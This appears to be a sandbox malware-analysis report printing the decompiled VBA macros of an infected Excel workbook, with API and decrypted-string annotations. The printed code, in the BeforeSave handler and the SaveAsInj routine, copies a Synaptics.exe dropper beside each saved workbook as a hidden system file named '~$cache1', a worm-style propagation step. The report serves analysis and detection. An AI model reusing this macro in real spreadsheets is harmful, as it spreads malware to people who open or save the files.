                                  LineInstructionMeta Information
                                  30

                                  Private Sub Workbook_BeforeClose(Cancel as Boolean)

                                  31

                                  If Not SheetsChanged Then

                                  executed
                                  32

                                  ActiveWorkbook.Saved = True

                                  Saved

                                  33

                                  Endif

                                  34

                                  End Sub

                                  APIsMeta Information

                                  ActiveSheet

                                  EnableEvents

                                  ScreenUpdating

                                  Sheets

                                  Sheets

                                  xlSheetHidden

                                  Save

                                  Sheets

                                  Sheets

                                  xlSheetVisible

                                  Select

                                  ScreenUpdating

                                  EnableEvents

                                  EnableEvents

                                  ScreenUpdating

                                  Sheets

                                  Sheets

                                  xlSheetHidden

                                  GetSaveAsFilename

                                  SaveAs

                                  xlOpenXMLWorkbookMacroEnabled

                                  Part of subcall function SaveAsInj@ThisWorkbook: CreateObject

                                  Part of subcall function SaveAsInj@ThisWorkbook: Environ

                                  Part of subcall function SaveAsInj@ThisWorkbook: FileExists

                                  Part of subcall function SaveAsInj@ThisWorkbook: FileExists

                                  Part of subcall function SaveAsInj@ThisWorkbook: FileCopy

                                  Part of subcall function SaveAsInj@ThisWorkbook: SetAttr

                                  Part of subcall function SaveAsInj@ThisWorkbook: vbHidden

                                  Part of subcall function SaveAsInj@ThisWorkbook: vbSystem

                                  Path

                                  Sheets

                                  Sheets

                                  xlSheetVisible

                                  Select

                                  ScreenUpdating

                                  EnableEvents

                                  StringsDecrypted Strings
                                  "Excel \xc7al\xfd\xfema Kitab\xfd (*.xlsm), *.xlsm"
                                  LineInstructionMeta Information
                                  51

                                  Private Sub Workbook_BeforeSave(ByVal SaveAsUI as Boolean, Cancel as Boolean)

                                  52

                                  Dim i as Integer

                                  executed
                                  53

                                  Dim AIndex as Integer

                                  54

                                  Dim FName

                                  56

                                  AIndex = ActiveWorkbook.ActiveSheet.Index

                                  ActiveSheet

                                  58

                                  If SaveAsUI = False Then

                                  59

                                  Cancel = True

                                  60

                                  Application.EnableEvents = False

                                  EnableEvents

                                  61

                                  Application.ScreenUpdating = False

                                  ScreenUpdating

                                  63

                                  For i = 1 To ActiveWorkbook.Sheets.Count - 1

                                  Sheets

                                  64

                                  ActiveWorkbook.Sheets(i).Visible = xlSheetHidden

                                  Sheets

                                  xlSheetHidden

                                  65

                                  Next i

                                  Sheets

                                  66

                                  ActiveWorkbook.Save

                                  Save

                                  68

                                  For i = 1 To ActiveWorkbook.Sheets.Count

                                  Sheets

                                  69

                                  ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                                  Sheets

                                  xlSheetVisible

                                  70

                                  Next i

                                  Sheets

                                  71

                                  ActiveWorkbook.Sheets(AIndex).Select

                                  Select

                                  72

                                  SheetsChanged = False

                                  74

                                  Application.ScreenUpdating = True

                                  ScreenUpdating

                                  75

                                  Application.EnableEvents = True

                                  EnableEvents

                                  76

                                  Else

                                  77

                                  Cancel = True

                                  78

                                  Application.EnableEvents = False

                                  EnableEvents

                                  79

                                  Application.ScreenUpdating = False

                                  ScreenUpdating

                                  81

                                  For i = 1 To ActiveWorkbook.Sheets.Count - 1

                                  Sheets

                                  82

                                  ActiveWorkbook.Sheets(i).Visible = xlSheetHidden

                                  Sheets

                                  xlSheetHidden

                                  83

                                  Next i

                                  Sheets

                                  85

                                  FName = Application.GetSaveAsFilename(fileFilter := "Excel \xc7al\xfd\xfema Kitab\xfd (*.xlsm), *.xlsm")

                                  GetSaveAsFilename

                                  86

                                  If FName <> False Then

                                  87

                                  ActiveWorkbook.SaveAs Filename := FName, FileFormat := xlOpenXMLWorkbookMacroEnabled

                                  SaveAs

                                  xlOpenXMLWorkbookMacroEnabled

                                  88

                                  SaveAsInj ActiveWorkbook.Path

                                  Path

                                  89

                                  Endif

                                  91

                                  For i = 1 To ActiveWorkbook.Sheets.Count

                                  Sheets

                                  92

                                  ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                                  Sheets

                                  xlSheetVisible

                                  93

                                  Next i

                                  Sheets

                                  94

                                  ActiveWorkbook.Sheets(AIndex).Select

                                  Select

                                  95

                                  SheetsChanged = False

                                  97

                                  Application.ScreenUpdating = True

                                  ScreenUpdating

                                  98

                                  Application.EnableEvents = True

                                  EnableEvents

                                  99

                                  Endif

                                  100

                                  End Sub

                                  APIsMeta Information

                                  Sheets

                                  ActiveWorkbook

                                  Sheets

                                  ActiveWorkbook

                                  LineInstructionMeta Information
                                  44

                                  Private Sub Workbook_SheetActivate(ByVal Sh as Object)

                                  45

                                  If ActiveWorkbook.Sheets.Count <> SheetCount Then

                                  Sheets

                                  ActiveWorkbook

                                  executed
                                  46

                                  SheetsChanged = True

                                  47

                                  SheetCount = ActiveWorkbook.Sheets.Count

                                  Sheets

                                  ActiveWorkbook

                                  48

                                  Endif

                                  49

                                  End Sub

                                  APIsMeta Information

                                  CreateObject

                                  Environ

                                  FileExists

                                  FileExists

                                  FileCopy

                                  SetAttr

                                  vbHidden

                                  vbSystem

                                  StringsDecrypted Strings
                                  "scripting.filesystemobject"
                                  "ALLUSERSPROFILE"
                                  LineInstructionMeta Information
                                  102

                                  Sub SaveAsInj(DIR as String)

                                  103

                                  Dim FSO as Object

                                  104

                                  Dim FN as String

                                  106

                                  Set FSO = CreateObject("scripting.filesystemobject")

                                  CreateObject

                                  107

                                  FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"

                                  Environ

                                  109

                                  If FSO.FileExists(FN) Then

                                  FileExists

                                  110

                                  If Not FSO.FileExists(DIR & "\~$cache1") Then

                                  FileExists

                                  111

                                  FileCopy FN, DIR & "\~$cache1"

                                  FileCopy

                                  112

                                  Endif

                                  113

                                  SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem

                                  SetAttr

                                  vbHidden

                                  vbSystem

                                  114

                                  Endif

                                  115

                                  End Sub

                                  APIsMeta Information

                                  CreateObject

                                  RegRead

                                  StringsDecrypted Strings
                                  "WScript.Shell"
                                  LineInstructionMeta Information
                                  125

                                  Function RegKeyExists(i_RegKey as String) as Boolean

                                  126

                                  Dim myWS as Object

                                  128

                                  On Error Goto ErrorHandler

                                  129

                                  Set myWS = CreateObject("WScript.Shell")

                                  CreateObject

                                  130

                                  myWS.RegRead i_RegKey

                                  RegRead

                                  131

                                  RegKeyExists = True

                                  132

                                  Exit Function

                                  133

                                  ErrorHandler:

                                  135

                                  RegKeyExists = False

                                  136

                                  End Function

                                  APIsMeta Information

                                  CreateObject

                                  RegRead

                                  StringsDecrypted Strings
                                  "WScript.Shell"
                                  LineInstructionMeta Information
                                  117

                                  Function RegKeyRead(i_RegKey as String) as String

                                  118

                                  Dim myWS as Object

                                  120

                                  On Error Resume Next

                                  121

                                  Set myWS = CreateObject("WScript.Shell")

                                  CreateObject

                                  122

                                  RegKeyRead = myWS.RegRead(i_RegKey)

                                  RegRead

                                  123

                                  End Function

                                  LineInstructionMeta Information
                                  36

                                  Private Sub Workbook_SheetChange(ByVal Sh as Object, ByVal Target as Range)

                                  37

                                  SheetsChanged = True

                                  38

                                  End Sub

                                  LineInstructionMeta Information
                                  40

                                  Private Sub Workbook_NewSheet(ByVal Sh as Object)

                                  41

                                  SheetsChanged = True

                                  42

                                  End Sub

                                  Reset < >